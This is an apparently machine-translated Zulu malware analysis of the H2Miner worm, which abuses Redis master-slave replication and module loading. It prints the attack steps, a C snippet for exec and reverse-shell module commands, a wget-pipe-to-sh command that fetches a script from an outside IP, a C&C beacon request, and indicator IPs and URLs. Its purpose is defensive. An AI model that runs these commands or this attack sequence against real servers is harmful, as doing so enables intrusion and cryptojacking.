Ngosuku olwedlule, enye yeziphakeli zephrojekthi yami yahlaselwa isibungu esifanayo. Ukuze uthole impendulo yombuzo othi "kwakuyini lokho?" Ngithole isihloko esihle seqembu le-Alibaba Cloud Security. Njengoba ngingasitholanga lesi sihloko ku-Habré, nginqume ukusihumushela ngokukhethekile <3
entry
Muva nje, ithimba lezokuphepha lika-Alibaba Cloud lithole ukuqubuka okungazelelwe kwe-H2Miner. Lolu hlobo lwesikelemu esinonya lusebenzisa ukuntuleka kokugunyazwa noma amagama ayimfihlo abuthakathaka e-Redis njengamasango kumasistimu akho, emva kwalokho luvumelanisa imojula yalo enonya nesigqila ngokuvumelanisa kwe-master-slave futhi ekugcineni lidawunilode le moduli enonya emshinini ohlaselwe futhi lenze ngonya. imiyalelo.
Esikhathini esedlule, ukuhlaselwa kwamasistimu akho kwakwenziwa ngokuyinhloko kusetshenziswa indlela ehilela imisebenzi ehleliwe noma okhiye be-SSH ababebhalelwe umshini wakho ngemva kokuba umhlaseli engene ku-Redis. Ngenhlanhla, le ndlela ayikwazi ukusetshenziswa kaningi ngenxa yezinkinga zokulawulwa kwemvume noma ngenxa yezinguqulo ezihlukile zesistimu. Kodwa-ke, le ndlela yokulayisha imojuli enobungozi ingenza ngokuqondile imiyalo yomhlaseli noma ithole ukufinyelela kugobolondo, okuyingozi kusistimu yakho.
Ngenxa yenani elikhulu lamaseva e-Redis aphethwe ku-inthanethi (cishe isigidi esingu-1), ithimba lezokuphepha le-Alibaba Cloud, njengesikhumbuzo sobungani, lincoma ukuthi abasebenzisi bangabelani nge-Redis ku-inthanethi futhi bahlole njalo amandla amaphasiwedi abo nokuthi afakwe engcupheni yini. ukukhetha okusheshayo.
I-H2Miner
I-H2Miner iyibhothi yezimayini yezinhlelo ezisekelwe ku-Linux ezingahlasela isistimu yakho ngezindlela ezihlukahlukene, okuhlanganisa nokuntula ukugunyazwa kwentambo ye-Hadoop, i-Docker, ne-Redis remote command execution (RCE) . I-botnet isebenza ngokulanda imibhalo eyingozi kanye nohlelo olungayilungele ikhompuyutha ukuze imayini idatha yakho, yandise ukuhlasela ngokuvundlile, futhi igcine imiyalo nokulawula ukuxhumana (C&C).
Shintshanisa amasheya RCE
Ulwazi ngale ndaba lwabiwe ngu-Pavel Toporkov ku-ZeroNights 2018. Ngemva kwenguqulo 4.0, i-Redis isekela isici sokulayisha i-plug-in esinikeza abasebenzisi ikhono lokulayisha ukuze amafayela ahlanganiswe no-C abe yi-Redis ukuze akhiphe imiyalo ethile ye-Redis. Lo msebenzi, nakuba uwusizo, uqukethe ukuba sengozini lapho, kumodi yesigqila esikhulu, amafayela angavunyelaniswa nesigqila ngemodi yokuvumelanisa ngokugcwele. Lokhu kungasetshenziswa umhlaseli ukudlulisa amafayela anonya. Ngemuva kokuthi ukudlulisa sekuqediwe, abahlaseli balayisha imodyuli kusenzakalo se-Redis esihlaselwe futhi bakhiphe noma yimuphi umyalo.
I-Malware Worm Analysis
Muva nje, ithimba lezokuphepha le-Alibaba Cloud lithole ukuthi usayizi weqembu le-H2Miner labavukuzi abanonya ukhule ngokumangalisayo. Ngokusho kokuhlaziywa, inqubo evamile yokuhlasela imi kanje:
I-H2Miner isebenzisa i-RCE Redis ukuhlasela okuphelele. Abahlaseli baqale bahlasele amaseva we-Redis angavikelekile noma amaseva anamagama ayimfihlo abuthakathaka.
Bese besebenzisa umyalo config set dbfilename red2.so ukushintsha igama lefayela. Ngemva kwalokhu, abahlaseli bakhipha umyalo slaveof ukusetha ikheli lomsingathi wokuphindaphinda kwesigqila.
Lapho isenzakalo se-Redis esihlaselwe sisungula uxhumano lwe-master-slave ne-Redis enonya ephethwe umhlaseli, umhlaseli uthumela imojuli ethelelekile esebenzisa umyalo wokuvumelanisa ngokugcwele ukuze avumelanise amafayela. Ifayela red2.so lizobe selidawuniloda emshinini ohlaselwe. Abahlaseli babe sebesebenzisa imojuli yokulayisha ./red2.so ukuze balayishe leli fayela. Imojula ingakwazi ukusebenzisa imiyalo evela kumhlaseli noma iqalise uxhumano oluhlehlayo (umnyango ongemuva) ukuze ithole ukufinyelela emshinini ohlaselwe.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Ngemva kokwenza umyalo ononya njenge / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, umhlaseli uzosetha kabusha igama lefayela eliyisipele futhi akhiphe imojuli yesistimu ukuze ahlanze ukulandelelwa. Nokho, ifayela le-red2.so lisazohlala emshinini ohlaselwe. Abasebenzisi bayelulekwa ukuthi banake ukuba khona kwefayela elisolisayo kufolda yesibonelo sabo se-Redis.
Ngokungeziwe ekubulaleni izinqubo ezinonya zokweba izinsiza, umhlaseli ulandele iskripthi esinonya ngokulanda nokusebenzisa amafayela kanambambili anonya ukuze . Lokhu kusho ukuthi igama lenqubo noma igama lenkomba eliqukethe i-kinsing kumsingathi lingase libonise ukuthi lowo mshini uthelelwe yileli gciwane.
Ngokwemiphumela yobunjiniyela ehlanekezelwe, uhlelo olungayilungele ikhompuyutha ikakhulukazi lenza imisebenzi elandelayo:
- Ilayisha amafayela futhi iwasebenzise
- Ukumayini
- Ukugcina ukuxhumana kwe-C&C nokusebenzisa imiyalo yabahlaseli
Sebenzisa i-mascan ukuskena kwangaphandle ukuze wandise amandla akho. Ngaphezu kwalokho, ikheli le-IP leseva ye-C&C linekhodi eqinile ohlelweni, futhi umsingathi ohlaselwe uzoxhumana neseva yokuxhumana ye-C&C esebenzisa izicelo ze-HTTP, lapho ulwazi lwe-zombie (iseva esengozini) lukhonjwa kunhlokweni ye-HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Ezinye izindlela zokuhlasela
Amakheli nezixhumanisi ezisetshenziswa isibungu
/ukukhumbula
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Ithiphu
Okokuqala, i-Redis akufanele ifinyeleleke ku-inthanethi futhi kufanele ivikelwe ngephasiwedi eqinile. Kubalulekile futhi ukuthi amaklayenti ahlole ukuthi alikho ifayela elithi red2.so ohlwini lwemibhalo lwe-Redis nokuthi akukho “kinsing” kufayela/igama lenqubo kumsingathi.
Source: www.habr.com